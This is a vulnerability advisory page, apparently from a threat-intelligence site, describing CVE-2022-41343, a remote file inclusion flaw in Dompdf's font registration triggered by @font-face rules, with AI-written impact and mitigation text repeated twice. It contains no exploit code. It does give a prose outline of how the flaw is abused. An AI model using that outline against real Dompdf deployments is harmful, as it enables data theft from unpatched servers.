CVE-2022-41343: n/a in n/a
registerFont in FontMetrics.php in Dompdf before 2.0.1 allows remote file inclusion because a URI validation failure does not halt font registration, as demonstrated by a @font-face rule.
AI Analysis
Technical Summary
CVE-2022-41343 is a high-severity vulnerability affecting Dompdf, a popular PHP library used for converting HTML and CSS to PDF documents. The vulnerability exists in the registerFont function within the FontMetrics.php file in versions of Dompdf prior to 2.0.1. The core issue is a failure in URI validation when processing @font-face CSS rules, which allows an attacker to perform remote file inclusion (RFI). Specifically, the function does not properly halt font registration upon encountering an invalid or malicious URI, enabling an attacker to supply a crafted URI that causes the application to include and potentially execute remote files. This can lead to the exposure of sensitive information, as the CVSS vector indicates a high impact on confidentiality, though integrity and availability are not affected. The vulnerability is exploitable remotely without authentication or user interaction, increasing its risk profile. While no known exploits are currently reported in the wild, the ease of exploitation combined with the high confidentiality impact makes this a critical issue for any system using vulnerable versions of Dompdf. Since Dompdf is widely used in web applications for generating PDFs dynamically, this vulnerability could be leveraged to access unauthorized data or execute malicious code in the context of the web server.
Potential Impact
For European organizations, the impact of CVE-2022-41343 can be significant, especially for those relying on web applications that utilize Dompdf for PDF generation. The vulnerability allows remote attackers to include arbitrary remote files, potentially leading to unauthorized disclosure of sensitive data such as personal information, financial records, or intellectual property. This is particularly concerning under the GDPR framework, where data breaches can result in substantial fines and reputational damage. Confidentiality breaches could undermine trust in services, especially in sectors like finance, healthcare, and government where document generation is common. Although the vulnerability does not directly affect integrity or availability, the ability to include remote files could be a stepping stone for further attacks, such as remote code execution or lateral movement within networks. The lack of required authentication and user interaction means attackers can exploit this vulnerability at scale, increasing the risk to European organizations with exposed web services using vulnerable Dompdf versions.
Mitigation Recommendations
To mitigate CVE-2022-41343, European organizations should immediately upgrade Dompdf to version 2.0.1 or later, where the vulnerability has been addressed. If upgrading is not immediately possible, organizations should implement strict input validation and sanitization on any user-supplied CSS or font URIs before they reach Dompdf. Additionally, restricting outbound network access from web servers to only trusted destinations can reduce the risk of remote file inclusion. Employing web application firewalls (WAFs) with rules targeting suspicious font-face URI patterns can provide temporary protection. Monitoring logs for unusual font registration attempts or unexpected network requests originating from the PDF generation process can help detect exploitation attempts. Finally, organizations should review their PDF generation workflows to minimize reliance on external resources and consider sandboxing PDF generation processes to limit potential damage from exploitation.
Affected Countries
Germany, France, United Kingdom, Netherlands, Italy, Spain, Poland, Sweden
CVE-2022-41343: n/a in n/a
Description
registerFont in FontMetrics.php in Dompdf before 2.0.1 allows remote file inclusion because a URI validation failure does not halt font registration, as demonstrated by a @font-face rule.
AI-Powered Analysis
Technical Analysis
CVE-2022-41343 is a high-severity vulnerability affecting Dompdf, a popular PHP library used for converting HTML and CSS to PDF documents. The vulnerability exists in the registerFont function within the FontMetrics.php file in versions of Dompdf prior to 2.0.1. The core issue is a failure in URI validation when processing @font-face CSS rules, which allows an attacker to perform remote file inclusion (RFI). Specifically, the function does not properly halt font registration upon encountering an invalid or malicious URI, enabling an attacker to supply a crafted URI that causes the application to include and potentially execute remote files. This can lead to the exposure of sensitive information, as the CVSS vector indicates a high impact on confidentiality, though integrity and availability are not affected. The vulnerability is exploitable remotely without authentication or user interaction, increasing its risk profile. While no known exploits are currently reported in the wild, the ease of exploitation combined with the high confidentiality impact makes this a critical issue for any system using vulnerable versions of Dompdf. Since Dompdf is widely used in web applications for generating PDFs dynamically, this vulnerability could be leveraged to access unauthorized data or execute malicious code in the context of the web server.
Potential Impact
For European organizations, the impact of CVE-2022-41343 can be significant, especially for those relying on web applications that utilize Dompdf for PDF generation. The vulnerability allows remote attackers to include arbitrary remote files, potentially leading to unauthorized disclosure of sensitive data such as personal information, financial records, or intellectual property. This is particularly concerning under the GDPR framework, where data breaches can result in substantial fines and reputational damage. Confidentiality breaches could undermine trust in services, especially in sectors like finance, healthcare, and government where document generation is common. Although the vulnerability does not directly affect integrity or availability, the ability to include remote files could be a stepping stone for further attacks, such as remote code execution or lateral movement within networks. The lack of required authentication and user interaction means attackers can exploit this vulnerability at scale, increasing the risk to European organizations with exposed web services using vulnerable Dompdf versions.
Mitigation Recommendations
To mitigate CVE-2022-41343, European organizations should immediately upgrade Dompdf to version 2.0.1 or later, where the vulnerability has been addressed. If upgrading is not immediately possible, organizations should implement strict input validation and sanitization on any user-supplied CSS or font URIs before they reach Dompdf. Additionally, restricting outbound network access from web servers to only trusted destinations can reduce the risk of remote file inclusion. Employing web application firewalls (WAFs) with rules targeting suspicious font-face URI patterns can provide temporary protection. Monitoring logs for unusual font registration attempts or unexpected network requests originating from the PDF generation process can help detect exploitation attempts. Finally, organizations should review their PDF generation workflows to minimize reliance on external resources and consider sandboxing PDF generation processes to limit potential damage from exploitation.
Affected Countries
For access to advanced analysis and higher rate limits, contact root@offseq.com
Technical Details
- Data Version
- 5.1
- Assigner Short Name
- mitre
- Date Reserved
- 2022-09-25T00:00:00.000Z
- Cisa Enriched
- true
- Cvss Version
- 3.1
- State
- PUBLISHED
Threat ID: 682f3a190acd01a24926123e
Added to database: 5/22/2025, 2:52:09 PM
Last enriched: 7/8/2025, 10:13:35 AM
Last updated: 8/15/2025, 6:36:27 AM
Views: 12
Related Threats
Researcher to release exploit for full auth bypass on FortiWeb
HighCVE-2025-9091: Hard-coded Credentials in Tenda AC20
LowCVE-2025-9090: Command Injection in Tenda AC20
MediumCVE-2025-9092: CWE-400 Uncontrolled Resource Consumption in Legion of the Bouncy Castle Inc. Bouncy Castle for Java - BC-FJA 2.1.0
LowCVE-2025-9089: Stack-based Buffer Overflow in Tenda AC20
HighActions
Updates to AI analysis are available only with a Pro account. Contact root@offseq.com for access.
Need enhanced features?
Contact root@offseq.com for Pro access with improved analysis and higher rate limits.